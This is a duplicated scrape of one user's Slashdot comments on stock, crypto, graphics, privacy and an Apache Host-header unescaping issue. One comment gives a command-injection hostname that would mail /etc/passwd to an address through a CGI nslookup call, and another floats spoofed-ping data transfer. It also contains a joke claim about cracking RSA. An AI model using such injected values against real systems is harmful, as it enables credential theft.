Have we reached the stage where we need to evolve ourselves? Where we are in control of evolution?
I was thinking of this last night and I came to the conclusion that we already control our evolution. Fetuses are routinely tested for a host of problems before they are born. Many parents will chose to not have the child if it doesn't look like it will fare well. If that isn't selection what is?
Also in China and countries where the government only allows parents to have one child parents regularly pre-select male children. I really have no clue why this is, but I suspect it is because: a> the family name is carried down through the male. b> the male child has a better chance at a higher paying job the way the world is structured today. While this may not seem like evolution I think it is. If there are 70% males and 30% females then natural selection in the male population is going to occur more rapidly.
I suppose this news is responsible for RedHat's 20% stock price increase today. For those of you missed out on the IPO last year, now is still a good time to buy. I picked up a bunch in the teens last month and have been watching with glee as it has almost doubled.
The thing about redhat that wall street doesn't understand is they aren't going to go away. It's a safe company as far as I'm concerned. Their stock may be wild and crazy right now but it's a good long term investment. I think that their 300/share price earlier this year was just silly but it shows were they could be in a few years.
Damn it Jim, I'm just an engineer not a financial advisor!
IIR, there have been court cases where cryptographically signed business documents have been treated as "hand signed." This occurred many years ago, I believe around 1995. I have also recalled recent cases where online shrink-wrap licenses have been upheld for a very limited domain - mainly IP protection.
In my mind, an online shrink-wrap licenses carry very little weight and I have no problem clicking "Yes, I agree" without reading an agreement. It's simply to easy to argue that another user posed as you. Web-crawler's can easily SUBMIT whatever is expected and a computer program cannot legally enter into such an agreement.
It's kind of scary to think that online sites may move to legally binding cryptographic signatures. Imagine a feature built into the tag that allows a user to digitally sign the POST data... Then you may end up having to read more legal agreements than actual online content. Slashdot may require you to use this feature or you automatically become "Anonymous coward." etc, etc. The possibilities are endless and many are not very encouraging.
Most client-server games do some calculations on the client side to :
a. reduce server load - this solution scales better. b. reduce latency and bandwidth
While I know nothing about the internals of D2 I would be very surprised if everything was calculated on the server - or I would expect the game to be laggy to play on a modem.
Even if this is the case, it's still possible to cheat through other means :
a. display game information the client is not supposed to know - but is sent over the network anyway. For example if a player shouldn't see behind a wall this calculation is usually done on the client side. b. bots can preform repetative task that make a little money and make the player rich. c. borgs, ala quake
Personally, I'd like to see an online game that *only* bots can play. Then programmers can write all sort of AIs to play against other AIs... and the world is persistant - so the programmers have to concentrate on how to program in dynamic environment. If your program dies - your character dies.:)
Worse yet - because many news sites break up their stories into two or three "pages", the Doublecross.coms of the world don't just know *what* you read, but how *fast* you read it, and whether you read just the first page and throw it away as "uninteresting" or the followup pages of the article.
What is wrong with this? If no one is interested in a topic then they shouldn't waste time writing about it. One way to gauge interest is by breaking up the article and seeing how far people get. I see nothing wrong with this - it a non envasive way to get feedback. Articles shouldn't be written in a vacum, and I don't think we need to have Nelson telling us everything.
You are getting content for free so why worry about it? I personally think banner ads are useless once you turn off animated gifs. Advertising networks also shoot themselves in the foot with all this tracking "technology." Occasionally I'll see an ad I have half a mind to click on - but when I see the URL points to some tracking cgi I say forget it. I want to know where I'm going to be sent before I click on something - and doubleclick is not a place I want to visit!
Meteorites are more rare than any other material on earth.
I'm just being picky here, but I would guess almost all of the radioactive materials are less available than meteorites. After all they have half lifes. But who want a radioactive knife?
Imagine trying to defend yourself: Stand back.... or I'll give you cancer... and you will die in five years if you don't get proper treatment!!!!
Is it DSL really worth the extra price on the house? I mean if you have to pay 10k-20k extra on the house you could spend that on a leased line or wireless DSL (like I have) - and then live anywhere you want. Besides, DSL will probably be thing a the past long before you sell your house.
I was interested in the tax benefits of off shore companies and IIR its perfectly legal to create an off-shore shell corporation (as long as you report all earning to the IRS). Many countries do not require you disclose the owners of the country nor do they make them public (which is a big attraction for many people).
Some of these countries don't even require your name to setup the company - just a legal contact who can be a local lawyer. These shell companies can then get ISP space in that country and serve web pages. The local lawyer will also (for a fee of course) forward all of your snail mail back to the US so you have an instant foreign headquarters.
A US company could sue you, a US resident, as an officer of the company but they have no way to determine who you are or what country you belong to. I read an article about sex.com, which was stolen from someone else. The domain is worth hundreds of millions so naturally they are trying to get it back - but sex.com was sold to an offshore company which is believed to be owned by the same guy - but no one except the IRS can prove it. I don't know if there are any procedures for getting at IRS records - but I would suspect they are very hard to obtain.
Of course this is all from my very limited knowledge... My research was targeted at legal activity and what you are proposing is semi-legal to illegal. Some of these countries have laws that allow them to disvolve companies and seize bank accounts from known drug trafficers and other illegal types.
I wasn't aware of freedom net at the time, but they use many of the same ideas. They do not do publishing (i.e. only outgoing connections) mainly for fear of legal problems.
Another method I've seen tossed around is to use redirecting proxy servers where URLs look like this:
http://site1.com/XXX where XXX decrypts to -> http://site2.com/YYY and YYY decrypts to http://site3.com/actual_content.html
The only trouble is getting people to run the proxy servers.
One other idea I have played around with is to use spoofied ping packets to transfer content semi-anonymously. It work by the connecting party somehow requesting the content and the posting their IP address. Then you, the server, send it to some random machine on the internet inside of a ping packet with a spoofed return address to them. This can be used to make the chain of computers between you and them very long - also making it travel through countries that are hard to get search warrents. The main problem is making the initial request, but that could be done with a Gnutella like network. The other problem here is the receiving computer needs to somehow specifiy which packets weren't received (because ping is lossy).
Without alpha channels you cannot composite an image onto a background without a "pixelized border". With an alpha channel the edges of one image can be smoothly faded into the background image. Alpha channels are especially useful in games. Things like smoke/fire are not solid objects they are transparent and they fade out near their extents. To achieve this gradual fade out the alpha channel goes from 255 (or 1.0) in the center of the image to 0 near the edges.
Also, "Alpha Buffers" are slightly different from "Alpha Channels". When drawing to a frame buffer with an Alpha Buffer the alpha values from the source image are usually copied along with the RGB components. In 3d games this is useful for drawing transparent shadows for objects. Without this, you can only draw solid black shadows or have a weird looking shadow.
- First the object is projected onto the ground. - The screen area where the shadow is to be drawn is cleared in the alpha channel. - The object is drawn with updates to the RGB channels turned off (i.e. only the alpha channel - also called a stencil buffer - is updated). - A flat polygon is transparently drawn to the frame buffer where the alpha value is not 0.
The result is a transparent shadow that doesn't overlap itself and get darker where polygons intersect.
On the playstation 2 and several new games truecolor is used. Since 24bit color is difficult to address (requires multiply by 3 or X*2+X) 32bit is usually used. This gives 8bits left over for the alpha/stencil buffer. All sorts of neat tricks can be done with an alpha buffer. I've used it on the PS2 to do depth of field (i.e. distance objects look blurry) rendering without having to draw my scene more than once.
This software is bug-free. It is perfect, as perfect as human beings have achieved. Consider these stats : the last three versions of the program -- each 420,000 lines long-had just one error each. The last 11 versions of this software had a total of 17 errors. Commercial programs of equivalent complexity would have 5,000 errors.
How can they be sure it's bug free? If the last 14 versions had 20 errors, did they think it was bug free each time - only to find more bugs? At 500k lines of code you can't prove it all mathematically and human checkers are.. well human.
One way to measure how many bugs your code has is to purposefully introduce a bug and tell people to find it. Then you count how many new bugs they found along with the bug you introduced and scale that by the lines of code you have. But this technique won't work if you one have 1 or 2 bugs that people are actively looking for in the first place. So, my question is - how can they be sure it is bug free?
I used to think that way about virus/worm and hacker/cracker. But..english terms change meaning weather you like it or not. This faq was written over 5 years ago. Since then the scope of people using these terms changed significantly. The public can't remember hundreds of jargon word so hacker and cracker become one "cracker"- and virus and worm become "virus". "Virus software" has to protect against what we knew as worms and well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logically reason for most people to call one thing a virus and other thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe,.com,.vbs, et cetera), the attachment is deleted. Poof. Gone.
The aren't gone or deleted. It will not allow the user to run or save them. If you later change your security policy you can save/run them any time you like. The data is always there.
I think this makes good sense as a default policy for 99% of users. If you can't figure out how to change your policy, you shouldn't be running attachments in the first place.
That was the whole problem in this case. You got email from people you trusted and so you opened it. PGP would have only added to your false sense of security!
(WOTB) way off topic, but... Actually most search engines cache web pages. That's how they are able to show context when you serach for something. They just don't make it available to the users in it's entirety. In my opinion google does violate copyright law. The thing is they remove the cache for anyone who complains so so far they have avoid lawsuits. I think it will take a court case to decide the issue. The other search engines don't appear comfortable being the first to have such a court case.
The caching is only really needed for sites that are frequently down or unavailable. These sites probably don't have the money to sue. Also, since google only updates pages every month or two it's not likely to take away from ad hits of big sites.
er.. the/jc/ was a typo on my part - it shouldn't be there.
As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.
For example if the unescaped hostname looks like this:
I noticed this exploit causes problem with Apache as well. This could possibly cause a security hole somewhere :
when I specify a URL like this:
http://www.somewhere.com/test.php3?q=8
apache correctly reports:
"Host: www.somewhere.com"
but when I specify a URL like this:
http://www.somewhere.com%2ftest.php3%3fq=8
apache reports:
"Host: www.somewhere.com/jc/test.php3?q=8"
This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.
But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.
Since we have long moved away from the gold standard, I think the money paid is acutal a virtual item. It only has value because the government says it does. Substitute government for online-game as you like.
From reading the story, it sounds like their problems stemmed from the fact they invested quickly in something they had no clue about. They did not take the time to consult with technical people, nor did they consult with customers who might have purchased the product.
1. Consulting with technical people would have told them two things:
a. one time pads are not possible without key management issues which makes their system the same as what is already out there (from what I gather from the article).
b. Even if they invented some sort of holy-grail of encryption AND somehow everyone agreed it was 100% secure, people wouldn't pay money for it when good solutions are exist for free or very low cost. Call up the patent owners of IDEA, and ask them if they've made $100 million licensing their product.
2. So where is the money being made from encryption? RSA, and Verisign, Certicon. Why? Because of the browsers. If you've got the greatest thing in the world, it's not going to be integrated into the majority of browsers until many years from now. Until then, no one gives a damn. Web sites want seamless usage for everyone, not some fancy thing that is just going to confuse people.
Other uses of crypto: Selling VPN hardware, smart cards, etc. In my opinion the VPN market is already served well by existing algorithms. Chips for doing 3DES are cheap and trusted. The one place were a faster/easier to implement algorithm would be adopted is smart cards - where price per unit out weighs licensing cost. From my talking with smart card makers this is a very niche market still and there is more talk than money floating around.
Not too long ago some researchers at IBM discovered an encryption algorithm that had some properties you could prove. It was neat stuff, and it made a big splash in the press for a few days and we never heard of it again - because there is no market for new crypto algorithms.
But, hey... what do I know... I STILL think priceline.com is a bad idea.
As to your other point most encryptions are very easy to diffrentiate from true noise. For instance they possess headers well deliminated start and stops of messages etc..
Most ciphers don't have headers (can't think of any that do). The output of a cipher is indistinguishable from noise. The only reason for headers is to make it recognizable on purpose (such as in pgp).
Moreover there is no necesity that encryption is undectable as such. While patterns in the output are *usually* indications of weakness in the crypto this is by no means a guarantee. I could modify DES by making its output 1128 bits with every other bit a 0 with no loss in its security. In fact it may be the case (I don't know if anyone else has superior knowledge please tell me) that it is possible to distingush the output of say DES and Blowfish without having any knowledge of the key or secret message.
You lost me there, but if you modify DES it wouldn't be DES anymore. Also, you can't tell what algorithm was used given a data stream and nothing else. Essential, the person would have to attempt brute force the stream using all known algorithms. The block size might be able to be detected if the stream has a lot of repeating data - but assuming the data was compressed first you will not be able to determine anything.
1. ECC is not patent free. Several companies are engaged in patent war over ECC (Certicom being the number one). The "nice" curves have already been patented (mathematicians in the audience will crucify me for describing some curves as "nice", but it's a reasonably accurate layman description--some curves make crypto easier than others, hence they're "nice").
There are a number of ECC patents, but it's possible to write a 'nice' implementation without violating any of them. It's not possible to write an implementation of RSA without violating their patent.
2. ECC is not faster than RSA. RSA is not faster than ECC. Nor are they equal in speed. While this all sounds terribly contradictory, it's all true; as we all know from having complained about NT-versus-Linux benchmarks, whoever is paying the analysis firm gets the results they want. When Certicom pays for ECC-versus-RSA, it always turns out that ECC is faster. When RSADSI pays for it, it always turns out that RSA is faster.
Emacs beats vi!
You have to take into account the relative strength of ECC keys versus RSA keys. ECC keys can be much shorter and therefore require much less processing. It's debately what that ratio should be, but contest like this help decide those numbers.
Even assuming that ECC were unambiguously faster than RSA, it wouldn't make a tinker's dam of difference. The applications which use asymmetric cryptography extensively are few and very far between. Symmetric ciphers have a better foundation in number theory, are more thoroughly cryptanalyzed and are often faster. Most of the time when asymmetric crypto is used, it's only used to negotiate a symmetric key. If it takes RSA a millisecond to encrypt/decrypt a 256-bit Twofish key, what do I care if it takes ECC a microsecond to do the same task?
One millisecond? Ok, I'm using weird hardware - but my decryption is way longer than 1 millisecond. (IIRC around 50-100ms for a 256 bit field). Considering all secure connections must decrypt at least one asymetrical key, you are looking at least 50ms on connection time. That means you can only accept 20 connections per second per machine. For high ussage applications this ain't so great. Speed does matter. Makes very little difference on a web browser - i'll give you that, but if you download a secure page with 20 inline images - each must do a RSA decrypt. Multiply by the number of users and you've got a CPU crisis on the server side - unless you start buying crpto-accelerator boards.
For those of you unfamaliar with with elliptical encryption I recommend this book. EE is an asymetrical algorithm in the same way RSA is. This "crack" is significant because it shows the relative strength between RSA and EE. 512 bit RSA ca n been cracked in about 12 microseconds. Other nice properties about EE algorithms :
- patent free (RSA expires this year!) - faster than RSA - can be implemented easily using 8/16bit microcode (ideal for smartcards)
Bruce likes to claim cracking contents have no value, but I disagree. EEs haven't been studied as much as RSA, so contest like this are important to showing the algorithms strength as implemented in the real world - and more importantly - generating interest in the research community.
Slashdot Mirror
Have we reached the stage where we need to evolve ourselves? Where we are in control of evolution?
I was thinking of this last night and I came to the conclusion that we already control our evolution. Fetuses are routinely tested for a host of problems before they are born. Many parents will chose to not have the child if it doesn't look like it will fare well. If that isn't selection what is?
Also in China and countries where the government only allows parents to have one child parents regularly pre-select male children. I really have no clue why this is, but I suspect it is because: a> the family name is carried down through the male. b> the male child has a better chance at a higher paying job the way the world is structured today. While this may not seem like evolution I think it is. If there are 70% males and 30% females then natural selection in the male population is going to occur more rapidly.
I suppose this news is responsible for RedHat's 20% stock price increase today. For those of you missed out on the IPO last year, now is still a good time to buy. I picked up a bunch in the teens last month and have been watching with glee as it has almost doubled.
The thing about redhat that wall street doesn't understand is they aren't going to go away. It's a safe company as far as I'm concerned. Their stock may be wild and crazy right now but it's a good long term investment. I think that their 300/share price earlier this year was just silly but it shows were they could be in a few years.
Damn it Jim, I'm just an engineer not a financial advisor!
full BGP4 routing so all those pipes are used at all times, not just when one fails.
Here is an article describing what BGP4 (Border Gateware Protocol) is and why you need it.
IIR, there have been court cases where cryptographically signed business documents have been treated as "hand signed." This occurred many years ago, I believe around 1995. I have also recalled recent cases where online shrink-wrap licenses have been upheld for a very limited domain - mainly IP protection.
In my mind, an online shrink-wrap licenses carry very little weight and I have no problem clicking "Yes, I agree" without reading an agreement. It's simply to easy to argue that another user posed as you. Web-crawler's can easily SUBMIT whatever is expected and a computer program cannot legally enter into such an agreement.
It's kind of scary to think that online sites may move to legally binding cryptographic signatures. Imagine a feature built into the tag that allows a user to digitally sign the POST data... Then you may end up having to read more legal agreements than actual online content. Slashdot may require you to use this feature or you automatically become "Anonymous coward." etc, etc. The possibilities are endless and many are not very encouraging.
Most client-server games do some calculations on the client side to :
:)
a. reduce server load - this solution scales better.
b. reduce latency and bandwidth
While I know nothing about the internals of D2 I would be very surprised if everything was calculated on the server - or I would expect the game to be laggy to play on a modem.
Even if this is the case, it's still possible to cheat through other means :
a. display game information the client is not supposed to know - but is sent over the network anyway. For example if a player shouldn't see behind a wall this calculation is usually done on the client side.
b. bots can preform repetative task that make a little money and make the player rich.
c. borgs, ala quake
Personally, I'd like to see an online game that *only* bots can play. Then programmers can write all sort of AIs to play against other AIs... and the world is persistant - so the programmers have to concentrate on how to program in dynamic environment. If your program dies - your character dies.
Worse yet - because many news sites break up their stories into two or three "pages", the Doublecross.coms of the world don't just know *what* you read, but how *fast* you read it, and whether you read just the first page and throw it away as "uninteresting" or the followup pages of the article.
What is wrong with this? If no one is interested in a topic then they shouldn't waste time writing about it. One way to gauge interest is by breaking up the article and seeing how far people get. I see nothing wrong with this - it a non envasive way to get feedback. Articles shouldn't be written in a vacum, and I don't think we need to have Nelson telling us everything.
You are getting content for free so why worry about it? I personally think banner ads are useless once you turn off animated gifs. Advertising networks also shoot themselves in the foot with all this tracking "technology." Occasionally I'll see an ad I have half a mind to click on - but when I see the URL points to some tracking cgi I say forget it. I want to know where I'm going to be sent before I click on something - and doubleclick is not a place I want to visit!
From the site:
Meteorites are more rare than any other material on earth.
I'm just being picky here, but I would guess almost all of the radioactive materials are less available than meteorites. After all they have half lifes. But who want a radioactive knife?
Imagine trying to defend yourself:
Stand back.... or I'll give you cancer... and you will die in five years if you don't get proper treatment!!!!
...Force people to give all their money to corporations, and eliminate all this huhu about marketing and products.
Get rid of the middle men that are advertising and the actual product. Things would be much more effecient that way...
Oh wait! That would be Human Slavery Controlled by Corporations!
And I thought you were going to say... Oh wait! That would be called the government.
Is it DSL really worth the extra price on the house? I mean if you have to pay 10k-20k extra on the house you could spend that on a leased line or wireless DSL (like I have) - and then live anywhere you want. Besides, DSL will probably be thing a the past long before you sell your house.
I was interested in the tax benefits of off shore companies and IIR its perfectly legal to create an off-shore shell corporation (as long as you report all earning to the IRS). Many countries do not require you disclose the owners of the country nor do they make them public (which is a big attraction for many people).
Some of these countries don't even require your name to setup the company - just a legal contact who can be a local lawyer. These shell companies can then get ISP space in that country and serve web pages. The local lawyer will also (for a fee of course) forward all of your snail mail back to the US so you have an instant foreign headquarters.
A US company could sue you, a US resident, as an officer of the company but they have no way to determine who you are or what country you belong to. I read an article about sex.com, which was stolen from someone else. The domain is worth hundreds of millions so naturally they are trying to get it back - but sex.com was sold to an offshore company which is believed to be owned by the same guy - but no one except the IRS can prove it. I don't know if there are any procedures for getting at IRS records - but I would suspect they are very hard to obtain.
Of course this is all from my very limited knowledge... My research was targeted at legal activity and what you are proposing is semi-legal to illegal. Some of these countries have laws that allow them to disvolve companies and seize bank accounts from known drug trafficers and other illegal types.
I wrote a discussion on how one might do anonymous/untraceable publishing on the internet:
http://jonathanclark.com/diary/anonpub/
I wasn't aware of freedom net at the time, but they use many of the same ideas. They do not do publishing (i.e. only outgoing connections) mainly for fear of legal problems.
Another method I've seen tossed around is to use redirecting proxy servers where URLs look like this:
http://site1.com/XXX
where XXX decrypts to -> http://site2.com/YYY and
YYY decrypts to http://site3.com/actual_content.html
The only trouble is getting people to run the proxy servers.
One other idea I have played around with is to use spoofied ping packets to transfer content semi-anonymously. It work by the connecting party somehow requesting the content and the posting their IP address. Then you, the server, send it to some random machine on the internet inside of a ping packet with a spoofed return address to them. This can be used to make the chain of computers between you and them very long - also making it travel through countries that are hard to get search warrents.
The main problem is making the initial request, but that could be done with a Gnutella like network.
The other problem here is the receiving computer needs to somehow specifiy which packets weren't received (because ping is lossy).
food for thought...
More notes on alpha channels :
Without alpha channels you cannot composite an image onto a background without a "pixelized border". With an alpha channel the edges of one image can be smoothly faded into the background image. Alpha channels are especially useful in games. Things like smoke/fire are not solid objects they are transparent and they fade out near their extents. To achieve this gradual fade out the alpha channel goes from 255 (or 1.0) in the center of the image to 0 near the edges.
Also, "Alpha Buffers" are slightly different from "Alpha Channels". When drawing to a frame buffer with an Alpha Buffer the alpha values from the source image are usually copied along with the RGB components. In 3d games this is useful for drawing transparent shadows for objects. Without this, you can only draw solid black shadows or have a weird looking shadow.
- First the object is projected onto the ground.
- The screen area where the shadow is to be drawn is cleared in the alpha channel.
- The object is drawn with updates to the RGB channels turned off (i.e. only the alpha channel - also called a stencil buffer - is updated).
- A flat polygon is transparently drawn to the frame buffer where the alpha value is not 0.
The result is a transparent shadow that doesn't overlap itself and get darker where polygons intersect.
On the playstation 2 and several new games truecolor is used. Since 24bit color is difficult to address (requires multiply by 3 or X*2+X) 32bit is usually used. This gives 8bits left over for the alpha/stencil buffer. All sorts of neat tricks can be done with an alpha buffer. I've used it on the PS2 to do depth of field (i.e. distance objects look blurry) rendering without having to draw my scene more than once.
This software is bug-free. It is perfect, as perfect as human beings have achieved. Consider these stats : the last three versions of the program -- each 420,000 lines long-had just one error each. The last 11 versions of this software had a total of 17 errors. Commercial programs of equivalent complexity would have 5,000 errors.
How can they be sure it's bug free? If the last 14 versions had 20 errors, did they think it was bug free each time - only to find more bugs? At 500k lines of code you can't prove it all mathematically and human checkers are.. well human.
One way to measure how many bugs your code has is to purposefully introduce a bug and tell people to find it. Then you count how many new bugs they found along with the bug you introduced and scale that by the lines of code you have. But this technique won't work if you one have 1 or 2 bugs that people are actively looking for in the first place. So, my question is - how can they be sure it is bug free?
I used to think that way about virus/worm and hacker/cracker. But..english terms change meaning weather you like it or not. This faq was written over 5 years ago. Since then the scope of people using these terms changed significantly. The public can't remember hundreds of jargon word so hacker and cracker become one "cracker"- and virus and worm become "virus". "Virus software" has to protect against what we knew as worms and well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logically reason for most people to call one thing a virus and other thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe, .com, .vbs, et cetera), the attachment is deleted. Poof. Gone.
The aren't gone or deleted. It will not allow the user to run or save them. If you later change your security policy you can save/run them any time you like. The data is always there.
I think this makes good sense as a default policy for 99% of users. If you can't figure out how to change your policy, you shouldn't be running attachments in the first place.
That was the whole problem in this case. You got email from people you trusted and so you opened it. PGP would have only added to your false sense of security!
(WOTB) way off topic, but...
Actually most search engines cache web pages. That's how they are able to show context when you serach for something. They just don't make it available to the users in it's entirety. In my opinion google does violate copyright law. The thing is they remove the cache for anyone who complains so so far they have avoid lawsuits. I think it will take a court case to decide the issue. The other search engines don't appear comfortable being the first to have such a court case.
The caching is only really needed for sites that are frequently down or unavailable. These sites probably don't have the money to sue. Also, since google only updates pages every month or two it's not likely to take away from ad hits of big sites.
er.. the /jc/ was a typo on my part - it shouldn't be there.
/etc/passwd`
As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.
For example if the unescaped hostname looks like this:
somewhere.com;`mail s@s.com
and some CGI script does something like this:
nslookup $HOSTNAME
you've got a big problem!
I noticed this exploit causes problem with Apache as well. This could possibly cause a security hole somewhere :
when I specify a URL like this:
http://www.somewhere.com/test.php3?q=8
apache correctly reports:
"Host: www.somewhere.com"
but when I specify a URL like this:
http://www.somewhere.com%2ftest.php3%3fq=8
apache reports:
"Host: www.somewhere.com/jc/test.php3?q=8"
This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.
But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.
money paid for EverQuest cloak == real-world item
Since we have long moved away from the gold standard, I think the money paid is acutal a virtual item. It only has value because the government says it does. Substitute government for online-game as you like.
From reading the story, it sounds like their problems stemmed from the fact they invested quickly in something they had no clue about. They did not take the time to consult with technical people, nor did they consult with customers who might have purchased the product.
1. Consulting with technical people would have told them two things:
a. one time pads are not possible without key management issues which makes their system the same as what is already out there (from what I gather from the article).
b. Even if they invented some sort of holy-grail of encryption AND somehow everyone agreed it was 100% secure, people wouldn't pay money for it when good solutions are exist for free or very low cost. Call up the patent owners of IDEA, and ask them if they've made $100 million licensing their product.
2. So where is the money being made from encryption? RSA, and Verisign, Certicon. Why? Because of the browsers. If you've got the greatest thing in the world, it's not going to be integrated into the majority of browsers until many years from now. Until then, no one gives a damn. Web sites want seamless usage for everyone, not some fancy thing that is just going to confuse people.
Other uses of crypto: Selling VPN hardware, smart cards, etc. In my opinion the VPN market is already served well by existing algorithms. Chips for doing 3DES are cheap and trusted. The one place were a faster/easier to implement algorithm would be adopted is smart cards - where price per unit out weighs licensing cost. From my talking with smart card makers this is a very niche market still and there is more talk than money floating around.
Not too long ago some researchers at IBM discovered an encryption algorithm that had some properties you could prove. It was neat stuff, and it made a big splash in the press for a few days and we never heard of it again - because there is no market for new crypto algorithms.
But, hey... what do I know... I STILL think priceline.com is a bad idea.
As to your other point most encryptions are very easy to diffrentiate from true noise. For instance they possess headers well deliminated start and stops of messages etc..
Most ciphers don't have headers (can't think of any that do). The output of a cipher is indistinguishable from noise. The only reason for headers is to make it recognizable on purpose (such as in pgp).
Moreover there is no necesity that encryption is undectable as such. While patterns in the output are *usually* indications of weakness in the crypto this is by no means a guarantee. I could modify DES by making its output 1128 bits with every other bit a 0 with no loss in its security. In fact it may be the case (I don't know if anyone else has superior knowledge please tell me) that it is possible to distingush the output of say DES and Blowfish without having any knowledge of the key or secret message.
You lost me there, but if you modify DES it wouldn't be DES anymore. Also, you can't tell what algorithm was used given a data stream and nothing else. Essential, the person would have to attempt brute force the stream using all known algorithms. The block size might be able to be detected if the stream has a lot of repeating data - but assuming the data was compressed first you will not be able to determine anything.
1. ECC is not patent free. Several companies are engaged in patent war over ECC (Certicom being the number one). The "nice" curves have already been patented (mathematicians in the audience will crucify me for describing some curves as "nice", but it's a reasonably accurate layman description--some curves make crypto easier than others, hence they're "nice").
There are a number of ECC patents, but it's possible to write a 'nice' implementation without violating any of them. It's not possible to write an implementation of RSA without violating their patent.
2. ECC is not faster than RSA. RSA is not faster than ECC. Nor are they equal in speed. While this all sounds terribly contradictory, it's all true; as we all know from having complained about NT-versus-Linux benchmarks, whoever is paying the analysis firm gets the results they want. When Certicom pays for ECC-versus-RSA, it always turns out that ECC is faster. When RSADSI pays for it, it always turns out that RSA is faster.
Emacs beats vi!
You have to take into account the relative strength of ECC keys versus RSA keys. ECC keys can be much shorter and therefore require much less processing. It's debately what that ratio should be, but contest like this help decide those numbers.
Even assuming that ECC were unambiguously faster than RSA, it wouldn't make a tinker's dam of difference. The applications which use asymmetric cryptography extensively are few and very far between. Symmetric ciphers have a better foundation in number theory, are more thoroughly cryptanalyzed and are often faster. Most of the time when asymmetric crypto is used, it's only used to negotiate a symmetric key. If it takes RSA a millisecond to encrypt/decrypt a 256-bit Twofish key, what do I care if it takes ECC a microsecond to do the same task?
One millisecond? Ok, I'm using weird hardware - but my decryption is way longer than 1 millisecond. (IIRC around 50-100ms for a 256 bit field). Considering all secure connections must decrypt at least one asymetrical key, you are looking at least 50ms on connection time. That means you can only accept 20 connections per second per machine. For high ussage applications this ain't so great. Speed does matter. Makes very little difference on a web browser - i'll give you that, but if you download a secure page with 20 inline images - each must do a RSA decrypt. Multiply by the number of users and you've got a CPU crisis on the server side - unless you start buying crpto-accelerator boards.
Ok, I got confused mail. RSA can't really be broken in 12 micro seconds. That was a joke - refering to a previous article posted on /.
512 rsa really takes a few days to factor with specialized hardware (AFAIK).
For those of you unfamaliar with with elliptical encryption I recommend this book. EE is an asymetrical algorithm in the same way RSA is. This "crack" is significant because it shows the relative strength between RSA and EE. 512 bit RSA ca n been cracked in about 12 microseconds. Other nice properties about EE algorithms :
- patent free (RSA expires this year!)
- faster than RSA
- can be implemented easily using 8/16bit microcode (ideal for smartcards)
Bruce likes to claim cracking contents have no value, but I disagree. EEs haven't been studied as much as RSA, so contest like this are important to showing the algorithms strength as implemented in the real world - and more importantly - generating interest in the research community.